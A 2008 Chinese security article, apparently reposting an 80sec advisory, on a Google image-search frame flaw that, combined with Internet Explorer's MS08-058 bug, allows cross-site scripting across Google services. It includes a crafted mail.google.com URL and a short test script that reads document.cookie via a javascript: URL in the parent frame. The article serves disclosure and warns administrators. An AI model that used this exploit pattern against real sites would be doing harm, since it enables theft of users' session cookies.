WEB开发网
开发学院网络安全安全技术 解析由MS08-058引发的跨站脚本攻击 阅读

解析由MS08-058引发的跨站脚本攻击

 2008-10-30 13:30:12 来源:WEB开发网   
核心提示:漏洞说明:Google是全球最大的搜索引擎,同时Google拥有其他庞大的WEB应用程序产品线,解析由MS08-058引发的跨站脚本攻击,涉及EMAIL、BLOG、在线文档、个人主页、电子地图、论坛、RSS等互联网几乎所有的应用业务,80sec发现Google提供的图片搜索服务存在安全问题,微软已经在08年10月提供了

漏洞说明:Google是全球最大的搜索引擎。同时Google拥有其他庞大的WEB应用程序产品线,涉及EMAIL、BLOG、在线文档、个人主页、电子地图、论坛、RSS等互联网几乎所有的应用业务。80sec发现Google提供的图片搜索服务存在安全问题,结合IE浏览器的MS08-058漏洞可以造成整站的跨站脚本漏洞,几乎可以控制所有的Google服务和获得目标用户的认证信息。

漏洞站点:http://www.google.com

漏洞解析:Google提供的图片搜索服务存在网页框架安全问题,恶意攻击者可以指定网页的内嵌框架页指向任意网页。该服务提供的URL地址主域名可以更改成Google的其他业务的子域名,从而造成严重的钓鱼网页攻击隐患。如下:黑客指定imgrefurl参数就可能构造GMAIL相关服务的钓鱼网页。

http://mail.google.com/imgres?imgurl=80sec&imgrefurl=http://www.80sec.com&hl=com

该漏洞结合由80SEC团队成员发现的IE浏览器的MS08-058部分漏洞可以造成GOOGLE整站的跨站脚本XSS漏洞,linx在《利用IE 框架跨域》文档分析了MS08-058涉及网页框架安全问题,子框架网页可以操作主框架的窗口句柄。这种类型的漏洞主要危害是不受IE浏览器同源策略的限制,可以跨域控制其他域的网页,影响所有的WEB应用。微软已经在08年10月提供了MS08-058补丁修复了该漏洞。

测试代码:

将Google的漏洞页指向MS08-058漏洞攻击页

http://mail.google.com/imgres?imgurl=80sec&imgrefurl=http://www.80sec.com/MS08-058.htm&hl=com

MS08-058.htm内容

<script>
setTimeout(
function(){
parent.location.href=newString("javascript:alert(document.cookie)");
}
,1500);
</script>

即可获得GAMIL的Cookie信息

危害提醒:

黑客利用浏览器漏洞可以使这种类型的低风险Web安全漏洞扩大成影响所有Web应用的高风险安全问题,请各大网站及安全管理人员仔细分析评估MS08-058类型的Web安全问题。

Tags:解析 MS 引发

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接